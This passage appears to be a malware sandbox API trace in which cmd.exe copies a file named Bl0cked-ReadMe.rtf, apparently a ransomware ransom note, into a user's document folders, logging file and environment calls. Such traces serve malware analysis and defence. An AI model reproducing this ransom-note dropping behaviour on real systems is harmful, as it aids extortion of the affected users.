\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0127.775] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0127.775] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.775] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f1938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.775] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.775] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.775] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.776] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.776] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.776] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.776] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.776] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.776] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.776] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.776] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.776] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.776] GetEnvironmentStringsW () returned 0x2f2328* [0127.776] FreeEnvironmentStringsW (penv=0x2f2328) returned 1 [0127.776] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.776] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.776] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.776] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.776] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.776] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.776] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.776] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.776] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.776] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.776] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f578 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.776] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f578, lpFilePart=0x28f574 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f574*="Desktop") returned 0x18 [0127.776] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.776] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f2f4 | out: lpFindFileData=0x28f2f4) returned 0x2f0068 [0127.777] FindClose (in: hFindFile=0x2f0068 | out: hFindFile=0x2f0068) returned 1 [0127.777] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f2f4 | out: lpFindFileData=0x28f2f4) returned 0x2f0068 [0127.777] FindClose (in: hFindFile=0x2f0068 | out: hFindFile=0x2f0068) returned 1 [0127.777] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f2f4 | out: lpFindFileData=0x28f2f4) returned 0x2f0068 [0127.777] FindClose (in: hFindFile=0x2f0068 | out: hFindFile=0x2f0068) returned 1 [0127.777] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.777] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.777] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.777] GetEnvironmentStringsW () returned 0x2f2b48* [0127.777] FreeEnvironmentStringsW (penv=0x2f2b48) returned 1 [0127.777] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.778] GetConsoleOutputCP () returned 0x1b5 [0127.778] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.778] GetUserDefaultLCID () returned 0x409 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f6b8, cchData=128 | out: lpLCData="0") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f6b8, cchData=128 | out: lpLCData="0") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f6b8, cchData=128 | out: lpLCData="1") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.779] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.779] GetConsoleTitleW (in: lpConsoleTitle=0x2e0918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.779] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.779] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.780] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.780] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.780] _wcsicmp (_String1="type", _String2=")") returned 75 [0127.780] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0127.780] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0127.780] _wcsicmp (_String1="IF", _String2="type") returned -11 [0127.780] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0127.780] _wcsicmp (_String1="REM", _String2="type") returned -2 [0127.780] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0127.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.785] GetFileType (hFile=0x7) returned 0x2 [0127.785] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0127.785] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f5b0 | out: lpMode=0x28f5b0) returned 1 [0127.785] _dup (_FileHandle=1) returned 3 [0127.785] _close (_FileHandle=1) returned 0 [0127.786] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0127.786] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x28f580, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0127.787] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0127.787] GetConsoleTitleW (in: lpConsoleTitle=0x28f3b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.787] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0127.787] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0127.787] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0127.787] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0127.788] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.788] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x28ef14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ef14) returned 0x2e0ee0 [0127.788] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0127.788] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0127.788] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0127.788] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28de20, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0127.788] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0127.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.788] GetFileType (hFile=0x54) returned 0x1 [0127.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.789] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x28de78 | out: lpFileSizeHigh=0x28de78*=0x0) returned 0x1632 [0127.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.789] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.789] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.789] GetFileType (hFile=0x4c) returned 0x1 [0127.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.789] GetFileType (hFile=0x4c) returned 0x1 [0127.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.789] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.790] GetFileType (hFile=0x4c) returned 0x1 [0127.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.790] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.791] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.792] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.793] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.794] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle 